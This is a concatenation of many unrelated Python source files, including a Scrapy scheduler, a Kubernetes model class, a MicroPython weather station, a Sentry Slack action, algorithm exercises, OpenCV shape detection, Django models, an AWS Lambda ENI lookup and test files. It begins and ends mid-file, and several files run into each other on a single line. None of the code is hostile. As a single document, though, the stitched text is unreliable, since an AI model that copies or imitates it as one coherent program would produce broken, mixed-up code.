scrapy.crawler import CrawlerProcess from spiders.kanui_spider import KanuiSpider from spiders.dafiti_spider import DafitiSpider from spiders.farfetch_spider import FarfetchSpider from spiders.passarela_spider import PassarelaSpider from scrapy.conf import settings recommendationAPIHost = 'http://closetinn-ml-api' ''' Logging ''' # create logger logger = logging.getLogger('closetinn') logger.setLevel(logging.INFO) ''' Scrapy ''' process = CrawlerProcess(settings) # process.crawl(KanuiSpider) process.crawl(DafitiSpider) # process.crawl(FarfetchSpider) # process.crawl(PassarelaSpider) def run(): process.start() # the script will block here until the crawling is finished requests.put(recommendationAPIHost + '/updateDatabase') logger.info('---Scheduling Spiders---') schedule.every().day.at('6:00').do(run) while True: schedule.run_pending() time.sleep(1) <filename>kubernetes_py/models/v1/PodAntiAffinity.py #!/usr/bin/env python # -*- coding: utf-8 -*- # # This file is subject to the terms and conditions defined in # file 'LICENSE.md', which is part of this source code package. # from kubernetes_py.models.v1.WeightedPodAffinityTerm import WeightedPodAffinityTerm from kubernetes_py.models.v1.PodAffinityTerm import PodAffinityTerm from kubernetes_py.utils import is_valid_list class PodAntiAffinity(object): """ https://kubernetes.io/docs/api-reference/v1.6/#podantiaffinity-v1-core https://github.com/kubernetes_py/community/blob/master/contributors/design-proposals/podaffinity.md """ def __init__(self, model=None): super(PodAntiAffinity, self).__init__() self._preferred_during_scheduling_ignored_during_execution = [] self._required_during_scheduling_ignored_during_execution = [] if model is not None: self._build_with_model(model) def _build_with_model(self, model=None): if 'preferredDuringSchedulingIgnoredDuringExecution' in model: wpats = [] for x in model['preferredDuringSchedulingIgnoredDuringExecution']: wpat = WeightedPodAffinityTerm(x) wpats.append(wpat) self.preferred_during_scheduling_ignored_during_execution = wpats if 'requiredDuringSchedulingIgnoredDuringExecution' in model: pats = [] for x in model['requiredDuringSchedulingIgnoredDuringExecution']: pat = PodAffinityTerm(x) pats.append(pat) self.required_during_scheduling_ignored_during_execution = pats # ----------------------------------------------------------------- preferredDuringSchedulingIgnoredDuringExecution @property def preferred_during_scheduling_ignored_during_execution(self): return self._preferred_during_scheduling_ignored_during_execution @preferred_during_scheduling_ignored_during_execution.setter def preferred_during_scheduling_ignored_during_execution(self, wpats=None): if not is_valid_list(wpats, WeightedPodAffinityTerm): raise SyntaxError( 'PodAffinity: preferred_during_scheduling_ignored_during_execution: [ {} ] is invald.'.format(wpats)) self._preferred_during_scheduling_ignored_during_execution = wpats # ----------------------------------------------------------------- requiredDuringSchedulingIgnoredDuringExecution @property def required_during_scheduling_ignored_during_execution(self): return self._required_during_scheduling_ignored_during_execution @required_during_scheduling_ignored_during_execution.setter def required_during_scheduling_ignored_during_execution(self, pats=None): if not is_valid_list(pats, PodAffinityTerm): raise SyntaxError( 'PodAffinity: required_during_scheduling_ignored_during_execution: [ {} ] is invald.'.format(pats)) self._required_during_scheduling_ignored_during_execution = pats # ------------------------------------------------------------------------------------- serialize def serialize(self): data = {} if self.preferred_during_scheduling_ignored_during_execution: wpats = [] for x in self.preferred_during_scheduling_ignored_during_execution: wpat = x.serialize() wpats.append(wpat) data['preferredDuringSchedulingIgnoredDuringExecution'] = wpats if self.required_during_scheduling_ignored_during_execution: pats = [] for x in self.required_during_scheduling_ignored_during_execution: pat = x.serialize() pats.append(pat) data['requiredDuringSchedulingIgnoredDuringExecution'] = pats return data <reponame>caro-alvim/EstacaoMet_IoT from wifi_lib import conecta import urequests import dht import machine import time d = dht.DHT11(machine.Pin(4)) r = machine.Pin(2, machine.Pin.OUT) station = conecta("NOME_SUA_REDE", "SUA_SENHA") if station.isconnected(): print("Conectado") while True: d.measure() print("Temp={} Umid={}".format(d.temperature(), d.humidity())) if d.temperature() >=31 or d.humidity() >=70: r.value(1) siteAcessado = urequests.get("http://api.thingspeak.com/update?api_key=CHAVEDOTHINKSPEAK&field1={}&field2={}".format(d.temperature(),d.humidity())) print(siteAcessado.text) print("Envio concluído") else: print("Condições mínimas não alcançadas") r.value(0) time.sleep(20) <gh_stars>1-10 # -*- coding: utf-8 -*- """\ This is a python port of "Goose" orignialy licensed to Gravity.com under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. Python port was written by <NAME>ae Gravity.com licenses this file to you under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import re from goose.extractors import BaseExtractor import goose.text class LinkItem(dict): def __init__(self, url, text): self["url"] = url self["text"] = text @property def url(self): return self["url"] @property def text(self): return self["text"] def __repr__(self): return "(url={0}, text={1})".format( self.url.encode("utf-8", 'ignore'), self.text.encode("utf-8", 'ignore')) class LinksExtractor(BaseExtractor): BAD_HTML_LINK_NAME = re.compile(r'/style/') def extract(self): links = [] items = self.parser.getElementsByTag(self.article.top_node, 'a') for i in items: attr = self.parser.getAttribute(i, 'href') if attr: links.append(attr) return links def extract_html_links(self): links = [] items = self.parser.getElementsByTag(self.article.doc, 'a') for i in items: attr = self.parser.getAttribute(i, 'href') if not attr: continue text = self.parser.getText(i).strip() if not text or len(text.split(' ')) < 3: continue if self.BAD_HTML_LINK_NAME.search(attr): continue attr = self.get_clean_href(attr) if not attr: continue links.append(LinkItem(attr, text)) return links READ_MORE_RE = re.compile(r"read.*more", flags=re.IGNORECASE) def extract_read_more(self): items = self.parser.getElementsByTag(self.article.doc, "a") for link in items: text = self.parser.getText(link) if not self.READ_MORE_RE.search(text): continue href = self.parser.getAttribute(link, 'href') if href: return href return None def get_clean_href(self, href): if href[0] == "/" and href[1:2] != "/":#exlcude //ww.abc.com type names if self.article.site_domain and self.article.site_domain[-1] == '/': href = href[1:] href = self.article.site_domain + href else: link_site_domain = goose.text.get_site_domain(href) if self.article.site_domain and link_site_domain != self.article.site_domain: return None last_seg = href.split("/")[-1] if not last_seg or last_seg[0] == "#": return None return href <gh_stars>0 from __future__ import absolute_import from django import forms from django.utils.translation import ugettext_lazy as _ from sentry import http from sentry.rules.actions.base import EventAction from sentry.utils import metrics, json from sentry.models import Integration from .utils import build_attachment class SlackNotifyServiceForm(forms.Form): team = forms.ChoiceField(choices=(), widget=forms.Select( attrs={'style': 'width:150px'}, )) channel = forms.CharField(widget=forms.TextInput( attrs={'placeholder': 'i.e #critical-errors'}, )) def __init__(self, *args, **kwargs): # NOTE: Team maps directly to the integration ID team_list = [(i.id, i.name) for i in kwargs.pop('integrations')] self.channel_transformer = kwargs.pop('channel_transformer') super(SlackNotifyServiceForm, self).__init__(*args, **kwargs) if team_list: self.fields['team'].initial = team_list[0][0] self.fields['team'].choices = team_list self.fields['team'].widget.choices = self.fields['team'].choices def clean_channel(self): team = self.cleaned_data.get('team') channel = self.cleaned_data.get('channel', '').lstrip('#') channel_id = self.channel_transformer(team, channel) if channel_id is None and team is not None: params = { 'channel': channel, 'team': dict(self.fields['team'].choices).get(int(team)), } raise forms.ValidationError( _('The #%(channel)s channel does not exist in the %(team)s Slack team.'), code='invalid', params=params, ) return channel class SlackNotifyServiceAction(EventAction): form_cls = SlackNotifyServiceForm label = u'Send a notification to the Slack {team} team in {channel}' def is_enabled(self): return self.get_integrations().exists() def after(self, event, state): integration_id = self.get_option('team') channel = self.get_option('channel') integration = Integration.objects.get( provider='slack', organizations=self.project.organization, id=integration_id ) def send_notification(event, futures): attachment = build_attachment(event.group, event=event) payload = { 'token': integration.metadata['access_token'], 'channel': channel, 'attachments': json.dumps([attachment]), } session = http.build_session() resp = session.post('https://slack.com/api/chat.postMessage', data=payload) resp.raise_for_status() resp = resp.json() if not resp.get('ok'): self.logger.info('rule.fail.slack_post', extra={'error': resp.get('error')}) metrics.incr('notifications.sent', instance='slack.notification') yield self.future(send_notification) def render_label(self): try: integration_name = Integration.objects.get( provider='slack', organizations=self.project.organization, id=self.data['team'], ).name except Integration.DoesNotExist: integration_name = '[removed]' return self.label.format( team=integration_name, channel='#' + self.data['channel'], ) def get_integrations(self): return Integration.objects.filter( provider='slack', organizations=self.project.organization, ) def get_channel_id(self, integration_id, channel_name): try: integration = Integration.objects.get( provider='slack', organizations=self.project.organization, id=integration_id, ) except Integration.DoesNotExist: return None payload = { 'token': integration.metadata['access_token'], 'exclude_archived': False, 'exclude_members': True, } session = http.build_session() resp = session.get('https://slack.com/api/channels.list', params=payload) resp.raise_for_status() resp = resp.json() if not resp.get('ok'): self.logger.info('rule.slack.channel_list_failed', extra={'error': resp.get('error')}) return None return {c['name']: c['id'] for c in resp['channels']}.get(channel_name) def get_form_instance(self): return self.form_cls( self.data, integrations=self.get_integrations(), channel_transformer=self.get_channel_id, ) def knapsack(P, W, K): n = len(P) F = [[0] * (K + 1) for i in range(n + 1)] for i in range(1, n + 1): for k in range(1, K + 1): if k >= W[i]: F[i][k] = max(F[i - 1][k], F[i - 1][k - W[i]] + P[i]) else: F[i][k] = F[i - 1][k] k = K ans = [] for i in range(n, 0, -1): if F[i][k] != F[i - 1][k]: ans.append(i) k -= W[i] return ans if __name__ == '__main__': print(knapsack([0, 1, 6, 4, 7, 6], [0, 3, 4, 5, 8, 9], 13)) <filename>day_05/day_05.py # --- Day 5: Hydrothermal Venture --- # # You come across a field of hydrothermal vents on the ocean floor! # These vents constantly produce large, opaque clouds, so it would be best to avoid them if possible. # Each line of vents is given as a line segment in the format x1,y1 -> x2,y2 # where x1,y1 are the coordinates of one end the line segment and x2,y2 are the coordinates of the other end. # These line segments include the points at both ends. In other words: # An entry like 1,1 -> 1,3 covers points 1,1, 1,2, and 1,3. # # --- Part 1 --- # To avoid the most dangerous areas, you need to determine the number of points where at least two lines overlap. # Consider only horizontal and vertical lines. At how many points do at least two lines overlap? import numpy as np test_coordinates = np.array([[[int(z) for z in y.split(",")] for y in x.split(" -> ")] for x in open('resources/test_coordinates', 'r').readlines()], dtype=int) val_coordinates = np.array([[[int(z) for z in y.split(",")] for y in x.split(" -> ")] for x in open('resources/val_coordinates', 'r').readlines()], dtype=int) vent_grid = np.zeros((999, 999)) def find_overlaps(coordinates, grid): for pair in coordinates: x1, y1, x2, y2 = pair[0][0], pair[0][1], pair[1][0], pair[1][1] if x1 == x2: if y1 < y2: move = 1 else: move = -1 for increment in range(y1, y2 + move, move): grid[x1, increment] += 1 elif y1 == y2: if x1 < x2: move = 1 else: move = -1 for increment in range(x1, x2 + move, move): grid[increment, y1] += 1 return np.sum(np.where(grid > 1, 1, 0)) # TODO: Check why val output has offset of 5 # TODO: Work on task 2 print(find_overlaps(test_coordinates, vent_grid)) print(find_overlaps(val_coordinates, vent_grid)) # -*- coding: utf-8 -*- import tornado.escape def trim(c, text): return text.strip() def nl2br(c, text, escape=True, break_tag='<br />'): if not text: return '' text = tornado.escape.xhtml_escape(text) if escape else text return text.replace('\r\n', break_tag).replace('\r', break_tag).replace('\n', break_tag) def truncate(c, text, length, ellipsis='..'): if len(text) > length: return '%s%s' % (text[0:length], ellipsis) return text def yyyymmdd(c, datetime=None, timestamp=None, ms=False, concat='.'): return c.helper.datetime.date.yyyymmdd(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def mmdd(c, datetime=None, timestamp=None, ms=False, concat='.'): return c.helper.datetime.date.mmdd(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def hhiiss(c, datetime=None, timestamp=None, ms=False, concat=':'): return c.helper.datetime.time.hhiiss(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def hhii(c, datetime=None, timestamp=None, ms=False, concat=':'): return c.helper.datetime.time.hhii(datetime=datetime, timestamp=timestamp, ms=ms, concat=concat) def weekday(c, datetime=None, timestamp=None, ms=False, isoweekday=True): return c.helper.datetime.date.weekday(datetime=datetime, timestamp=timestamp, ms=ms, isoweekday=isoweekday) def request_uri(c, with_queries=True, query_quote=False, s=False, d=' ', p='_'): r = ('%s%s' % (d, p)).join(c.request.uri.split('/')).strip() if s else c.request.uri r = prefixize(c, r) r = r if with_queries else r.split('?')[0:1][0] return c.helper.web.url.quote(r) if query_quote else r def m17n(c, m17n_lang=None): if not m17n_lang: m17n_lang = c.get_cookie('__m17n__') return c.m17n.get(m17n_lang) def get(c, arg, default=None): return c.get_argument(arg, default=default) def number_format(c, val): return c.helper.numeric.number_format(val) def prefixize(c, static_url, query=None, combine_request_query=False, prefix=None, prefix_alternative=None): if combine_request_query: uri = c.helper.web.url.parse(c) if query and isinstance(query, dict): query = dict(uri.query, **query) elif not query: query = uri.query if query and isinstance(query, dict): uri = c.helper.web.url.parse(static_url) for k in query.keys(): v = query[k] if v is None and k in uri.query: del uri.query[k] elif v is not None: uri.query[k] = v static_url = c.helper.web.url.build(uri.path, uri.query) if prefix or 'X-Proxy-Prefix' in c.request.headers: p = prefix_alternative or prefix or c.request.headers['X-Proxy-Prefix'].strip() p = p[:-1] if p.endswith('/') else p if static_url.startswith(p): return static_url[len(p):] or '/' return static_url else: return static_url <reponame>Dikshuy/Autumn-of-Automation<gh_stars>1-10 import imutils import cv2 class ShapeDetector: def __init__(self): pass def detect(self, c): shape = "unidentified" peri = cv2.arcLength(c, True) approx = cv2.approxPolyDP(c, 0.04 * peri, True) if len(approx) == 3: shape = "triangle" elif len(approx) == 4: (x, y, w, h) = cv2.boundingRect(approx) aspect_ratio = w / float(h) if aspect_ratio >= 0.95 and aspect_ratio <= 1.05: #this is because approxPolyDP has a variance of 1-5% shape = "square" elif aspect_ratio >= 0.712 and aspect_ratio <= 0.814: shape = "rhombus" else: shape = "rectangle" else: (x,y),radius = cv2.minEnclosingCircle(approx) center = (int(x),int(y)) radius = int(radius) if len(approx) == 8: shape = "circle" else: shape = "oval" return shape image = cv2.imread("img.jpg") resized = imutils.resize(image, width=300) ratio = image.shape[0] / float(resized.shape[0]) gray = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY) blurred = cv2.GaussianBlur(gray, (5, 5), 0) thresh = cv2.threshold(blurred, 150, 255, cv2.THRESH_BINARY)[1] cnts = cv2.findContours(thresh.copy(), cv2.RETR_LIST , cv2.CHAIN_APPROX_SIMPLE) cnts = imutils.grab_contours(cnts) sd = ShapeDetector() for c in cnts: M = cv2.moments(c) cX = int((M["m10"] / M["m00"]) * ratio) cY = int((M["m01"] / M["m00"]) * ratio) shape = sd.detect(c) c = c.astype("float") c *= ratio c = c.astype("int") cv2.drawContours(image, [c], -1, (0, 255, 0), 2) cv2.putText(image, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 0), 2) cv2.imshow("Image", image) cv2.waitKey(0) cv2.destroyAllWindows()def compute(m , y1, x1, y2, x2 ): w = x2-x1+1 h = y2-y1+1 if w==1 or h==1: return 1 gmax = 1 new_m = [[1 for i in range(w)] for j in range(h)] for i in range(y1+1,y2+1): for j in range(x1+1, x2+1): if(m[i-1][j-1]<=m[i-1][j] and m[i-1][j-1]<=m[i][j-1] and m[i-1][j]<=m[i][j] and m[i][j-1]<m[i][j]): new_m[i-y1][j-x1] = min(new_m[i-1-y1][j-1-x1],new_m[i-1-y1][j-x1],new_m[i-y1][j-1-x1])+1 if(new_m[i-y1][j-x1]>gmax): gmax = new_m[i-y1][j-x1] return gmax def main(): h,w = list(map(int, input().split())) m = [ '' for j in range(h)] for i in range(h): m[i] = input() n = int(input()) results = [] for i in range(n): x1,y1,x2,y2 = list(map(int,input().split())) results.append(compute(m,x1-1,y1-1,x2-1,y2-1)) print() for i in results : print(i) if __name__ == '__main__': main() <gh_stars>0 #04 - Utilizando funções e listas faça um programa que receba uma data no formato DD/MM/AAAA e devolva uma string no formato DD de mesPorExtenso de AAAA. Opcional: valide a data e retorne 'data inválida' caso a data seja inválida. from os import system def mesPorExtenso(): system('cls') # limpa o prompt de comando dia = int(input('Digite o dia[DD]: ')) # usuário digita um dia válido [1 - 31] mes = int(input('Digite o mês[MM]: ')) # usuário digita um mes válido [1 - 12] ano = int(input('Digite o ano[AAAA]: ')) # usuário digita um ano válido meses = ['Janeiro', 'Fevereiro', 'Março', 'Abril', 'Maio', 'Junho', 'Julho', 'Agosto', 'Setembro', 'Outubro', 'Novembro', 'Dezembro'] # lista com todos os meses, por extenso for i, m in enumerate(meses): # i = índice , m = meses por extenso if mes == i +1: # se o mes for igual a i + 1... mes = m # mes recebe o mes por extenso correspondente ao seu i if dia > 29 and mes == 'Fevereiro': # se o dia for maior que 29 e o mes for fevereiro... print('\nData Inválida! Fevereiro só pode ter até 29 dias!\n') elif dia > 31: # se o dia for maior que 31 ... print('\nData Inválida! Os meses só podem ter até 31 dias (exceto fevereiro)\n') elif mes not in meses: # se o mes não estiver dentro da lista de meses... print('\nData inválida! Meses só vão até 12!\n') elif ano < 0: # se o ano for negativo... print(f'\n-=-=-=-=-=-=-=-=-=-\n{dia} de {mes} de {ano * -1} a.C\n=-=-=-=-=-=-=-=-=-\n') else: # se nenhuma das condições acima for atendida ... print(f'\n-=-=-=-=-=-=-=-=-=-\n{dia} de {mes} de {ano}\n=-=-=-=-=-=-=-=-=-\n') mesPorExtenso() import json import boto3 REGION_NAME = 'us-west-2' ENI_ID = 'eni-XXXXXXXXXXXXXXXXX' EC2_CLIENT = boto3.client('ec2', region_name=REGION_NAME) LAMBDA_CLIENT = boto3.client('lambda', region_name=REGION_NAME) PAGINATOR = LAMBDA_CLIENT.get_paginator('list_functions') # Make sure ALL versions are returned OPERATION_PARAMETERS = {'FunctionVersion': 'ALL'} # Create an empty set to dump all the individual function's data ALL_FUNCTIONS = set() def find_eni(eni_id): """Find ENI metadata""" response = EC2_CLIENT.describe_network_interfaces( Filters=[ { 'Name': 'network-interface-id', 'Values': [eni_id] } ] ) return response def find_functions(eni_response): """ Find all functions using that ENI """ # Functions should be using the exact SGs as that of ENI # ENI's subnet must be a part of Lambda's subnet group # SDK calls are paginated, they can be unpacked with paginators page_iterator = PAGINATOR.paginate(**OPERATION_PARAMETERS) for page in page_iterator: functions = page['Functions'] for function in functions: try: # is this function in VPC? if function['VpcConfig']['VpcId']: # Does the SG match? if len(function['VpcConfig']['SecurityGroupIds']) == len(eni_response['Groups']): # Sort and check if they match eni_security_groups = [i['GroupId'] for i in eni_response['Groups']] if eni_security_groups.sort() == function['VpcConfig']['SecurityGroupIds'].sort(): # is Lambda's subnet a part of ENI's subnet? if eni_response['SubnetId'] in function['VpcConfig']['SubnetIds']: funct = json.dumps(function) ALL_FUNCTIONS.add(funct) except Exception as e: pass def format_function(all_functions, eni_response): """Format function data""" print(f"Lambda function(s) using ENI: {eni_response['NetworkInterfaceId']}:\n") for function in all_functions: function_data = json.loads(function) print(function_data['FunctionArn']) print("") def lambda_handler(event, context): """Main function""" eni_response = find_eni(ENI_ID) eni_response = eni_response['NetworkInterfaces'] # ENI exists? if eni_response: eni_response = eni_response[0] # Find and format function associated to this ENI find_functions(eni_response) format_function(ALL_FUNCTIONS, eni_response) else: return { 'statusCode': 200, 'body': f"ENI: {ENI_ID} not found in {REGION_NAME}" } return { 'statusCode': 200, 'body': "See function logs" } import urllib.request import io from general import * def get_robots_txt(url): if url.endswith("/"): path = url else: path = url + "/" pp=path + "robots.txt" try: req = urllib.request.urlopen(pp, data =None) data = io.TextIOWrapper(req, encoding="utf-8") except Exception as ex: print("Robots.txt file doesn't exist") return 0 else: return data.read() <reponame>kevintsq/GetSubprocessCPUTimeSpawnedByParentProcess<filename>GetProcessCPUTimeUsingWin32API.py import win32api import win32process import win32con import win32event import time # Reference: https://www.programcreek.com/python/example/8489/win32process.CreateProcess # Reference: https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/ns-processthreadsapi-startupinfoa StartupInfo = win32process.STARTUPINFO() StartupInfo.dwFlags = win32process.STARTF_USESHOWWINDOW StartupInfo.wShowWindow = win32con.SW_NORMAL StartupInfo.hStdInput = win32api.GetStdHandle(win32api.STD_INPUT_HANDLE) StartupInfo.hStdOutput = win32api.GetStdHandle(win32api.STD_OUTPUT_HANDLE) StartupInfo.hStdError = win32api.GetStdHandle(win32api.STD_ERROR_HANDLE) command = r"java -jar Test.jar" startTime = time.time() TIMEOUT = 1.5 # create subprocess using win32api hProcess, hThread, dwProcessId, dwThreadId = win32process.CreateProcess( None, command, None, None, 0, win32process.NORMAL_PRIORITY_CLASS, None, None, StartupInfo) # waiting for subprocess to exit win32event.WaitForSingleObject(hProcess, int(TIMEOUT * 1000)) win32api.TerminateProcess(hProcess, 0) win32event.WaitForSingleObject(hProcess, win32event.INFINITE) # query cpu time using win32api sTime = win32process.GetProcessTimes(hProcess) # print(sTime) print(f"cputime: {(sTime['KernelTime'] + sTime['UserTime']) / 10000000}") print(f"realtime: {(sTime['ExitTime'] - sTime['CreationTime']).total_seconds()}") <filename>backend/api/models.py from django.db import models # Create your models here. class Member(models.Model): account_number=models.CharField(max_length=100,null=True, blank=True,unique=True) fname=models.CharField(max_length=100) mname=models.CharField(max_length=100,null=True,blank=True) lname=models.CharField(max_length=100) age=models.IntegerField(default=0,null=True,blank=True) gender=models.CharField(max_length=30) occupation=models.CharField(max_length=300,null=True,blank=True) civil_status=models.CharField(max_length=50) partner_name=models.CharField(max_length=200,null=True,blank=True) address=models.CharField(max_length=200) mobile_number=models.CharField(max_length=14) monthly_income=models.BigIntegerField(default=0) def __str__(self): return self.fname +' '+self.lname class ClusterName(models.Model): name=models.CharField(max_length=200) class Loan(models.Model): loan_cycle= models.IntegerField(default=1) loan_type=models.IntegerField(default=1) loan_mode=models.IntegerField(default=1) member=models.ForeignKey(Member,on_delete=models.PROTECT,related_name="loanapplications") clustername=models.ForeignKey(ClusterName,on_delete=models.PROTECT,related_name="loanapplications") principal=models.DecimalField(max_digits=40,decimal_places=2) interest_rate=models.DecimalField(max_digits=40,decimal_places=2) interest=models.DecimalField(max_digits=40,decimal_places=2) processing_fee=models.DecimalField(max_digits=40,decimal_places=2,null=True,blank=True) loan_period=models.FloatField(default=0.0) payment_period=models.IntegerField(default=1) loan_witness=models.CharField(max_length=200,null=True,blank=True) cbu=models.DecimalField(max_digits=20,decimal_places=2,null=True,blank=True) date_release=models.DateField(null=True, blank=True) class LoanPayment(models.Model): loan=models.ForeignKey(Loan,on_delete=models.PROTECT,related_name="loanpayments") date_of_payment = models.DateField() beginning_balance = models.DecimalField(max_digits=40,decimal_places=2) paid_interest = models.DecimalField(max_digits=40,decimal_places=2) paid_principal = models.DecimalField(max_digits=40,decimal_places=2) ending_balance = models.DecimalField(max_digits=40,decimal_places=2) class File(models.Model): file = models.FileField(upload_to='file/') class LoanSchedulePayments(models.Model): loan=models.ForeignKey(Loan,on_delete=models.CASCADE,null=True,related_name="loanscheds") date=models.DateField() principal=models.DecimalField(max_digits=40,decimal_places=2) interest=models.DecimalField(max_digits=40,decimal_places=2) """ Examples of code for recalibration. """ import numpy as np import matplotlib.pyplot as plt from matplotlib import rc import uncertainty_toolbox.data as udata import uncertainty_toolbox.metrics as umetrics from uncertainty_toolbox.metrics_calibration import ( get_proportion_lists_vectorized, ) import uncertainty_toolbox.viz as uviz from uncertainty_toolbox.recalibration import iso_recal import neatplot neatplot.set_style() neatplot.update_rc("text.usetex", False) # Set random seed np.random.seed(11) # Generate synthetic predictive uncertainty results n_obs = 650 f, std, y, x = udata.synthetic_sine_heteroscedastic(n_obs) # Save figure (set to True to save) savefig = False def save_figure(name_str, file_type="png"): """Save figure, or do nothing if savefig is False.""" if savefig: neatplot.save_figure(name_str, file_type) def update_rc_params(): """Update matplotlib rc params.""" plt.rcParams.update({"font.size": 14}) plt.rcParams.update({"xtick.labelsize": 14}) plt.rcParams.update({"ytick.labelsize": 14}) # List of predictive means and standard deviations pred_mean_list = [f] pred_std_list = [ std * 0.5, # overconfident std * 2.0, # underconfident ] # Loop through, make plots, and compute metrics for i, pred_mean in enumerate(pred_mean_list): for j, pred_std in enumerate(pred_std_list): # Before recalibration exp_props, obs_props = get_proportion_lists_vectorized(pred_mean, pred_std, y) recal_model = None mace = umetrics.mean_absolute_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) rmsce = umetrics.root_mean_squared_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) ma = umetrics.miscalibration_area( pred_mean, pred_std, y, recal_model=recal_model ) print("Before Recalibration") print(" MACE: {:.5f}, RMSCE: {:.5f}, MA: {:.5f}".format(mace, rmsce, ma)) uviz.plot_calibration( pred_mean, pred_std, y, exp_props=exp_props, obs_props=obs_props, show=True, ) # After recalibration recal_model = iso_recal(exp_props, obs_props) recal_exp_props, recal_obs_props = get_proportion_lists_vectorized( pred_mean, pred_std, y, recal_model=recal_model ) mace = umetrics.mean_absolute_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) rmsce = umetrics.root_mean_squared_calibration_error( pred_mean, pred_std, y, recal_model=recal_model ) ma = umetrics.miscalibration_area( pred_mean, pred_std, y, recal_model=recal_model ) print(" After Recalibration") print(" MACE: {:.5f}, RMSCE: {:.5f}, MA: {:.5f}".format(mace, rmsce, ma)) uviz.plot_calibration( pred_mean, pred_std, y, exp_props=recal_exp_props, obs_props=recal_obs_props, show=True, ) # Generated by Django 3.0.3 on 2020-04-03 18:31 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('core', '0009_auto_20200324_1254'), ] operations = [ migrations.AddField( model_name='post', name='can_comment', field=models.BooleanField(default=False), ), migrations.AddField( model_name='post', name='post_type', field=models.CharField(choices=[('index', 'index'), ('useful', 'useful'), ('news', 'news')], default='news', max_length=25), ), ] <gh_stars>1000+ """ A collection of extra features in gryphon-exec. """ <gh_stars>0 import _jpype import jpype from jpype.types import * import sys import logging import time import common class Tracer(object): ctor = 0 dtor = 0 def __init__(self): Tracer.ctor += 1 def __del__(self): Tracer.dtor += 1 @staticmethod def reset(): Tracer.ctor = 0 Tracer.dtor = 0 @staticmethod def leaked(): return Tracer.ctor - Tracer.dtor @staticmethod def attach(obj): object.__setattr__(obj, "_trace", Tracer()) # This test finds reference counting leak by attaching an # object that lives as long as the wrapper is alive. # It can't detect Java reference counter leaks. class Leak2TestCase(common.JPypeTestCase): def setUp(self): common.JPypeTestCase.setUp(self) self.fixture = JClass('jpype.common.Fixture')() Tracer.reset() def testArrayCall(self): JA = JArray(JInt) def call(): inst = JA(100) Tracer.attach(inst) self.fixture.callObject(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testArrayMemoryView(self): JA = JArray(JInt) def call(): inst = JA(100) Tracer.attach(inst) memoryview(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testBufferCall(self): byte_buffer = jpype.JClass('java.nio.ByteBuffer') def call(): inst = byte_buffer.allocateDirect(10) Tracer.attach(inst) self.fixture.callObject(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) def testBufferMemoryView(self): byte_buffer = jpype.JClass('java.nio.ByteBuffer') def call(): inst = byte_buffer.allocateDirect(10) Tracer.attach(inst) memoryview(inst) for i in range(100): call() self.assertEqual(Tracer.leaked(), 0) <filename>tests/http/operators/test_http.py<gh_stars>10-100 from unittest import mock import pytest from airflow.exceptions import TaskDeferred from astronomer.providers.http.sensors.http import HttpSensorAsync from astronomer.providers.http.triggers.http import HttpTrigger def test_http_run_now_operator_async(): """ Asserts that a task is deferred and a HttpTrigger will be fired when the HttpSensorAsync is executed. """ operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", ) with pytest.raises(TaskDeferred) as exc: operator.execute({}) assert isinstance(exc.value.trigger, HttpTrigger), "Trigger is not a HttpTrigger" def test_http_response_check_does_not_run_async(): """ Asserts that a task is not deferred when response_check arg is passed to HttpSensorAsync. """ operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", response_check=lambda response: "httpbin" in response.text, ) with mock.patch("astronomer.providers.http.sensors.http.HttpSensorAsync.defer") as mock_defer, mock.patch( "airflow.sensors.base.BaseSensorOperator.execute" ): operator.execute({}) mock_defer.assert_not_called() operator = HttpSensorAsync( task_id="run_now", endpoint="test-endpoint", ) with mock.patch("astronomer.providers.http.sensors.http.HttpSensorAsync.defer") as mock_defer: operator.execute({}) mock_defer.assert_called_once_with(timeout=None, trigger=mock.ANY, method_name="execute_complete") <reponame>cristaloleg/wallaroo<gh_stars>0 # Copyright 2017 The Wallaroo Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. See the License for the specific language governing # permissions and limitations under the License. """ """ from .cluster import (add_runner, Cluster, ClusterError, Runner, RunnerData, runner_data_format, start_runners) from .control import (SinkAwaitValue, SinkExpect, TryUntilTimeout, WaitForClusterToResumeProcessing) from .end_points import (Metrics, MultiSequenceGenerator, Reader, Sender, Sink, files_generator, framed_file_generator, iter_generator, newline_file_generator, sequence_generator) from .errors import (AutoscaleError, CrashedWorkerError, DuplicateKeyError, ExpectationError, MigrationError, PipelineTestError, StopError, TimeoutError) from .external import (clean_resilience_path, create_resilience_dir, run_shell_cmd, get_port_values, is_address_available, setup_resilience_path) from .integration import pipeline_test from .logger import (DEFAULT_LOG_FMT, INFO2, set_logging) from .metrics_parser import (MetricsData, MetricsParser, MetricsParseError) from .observability import (cluster_status_query, get_func_name, multi_states_query, ObservabilityNotifier, ObservabilityResponseError, ObservabilityTimeoutError, partition_counts_query, partitions_query, state_entity_query) from .stoppable_thread import StoppableThread from .typed_list import TypedList <reponame>TOSUKUi/ReadyForApi<filename>readyforapi/user.py # make this until 2017/5/30 from . import * from .core import ReadyForObject, ReadyForConnection from cached_property import cached_property from .errors import UserNoIDException class 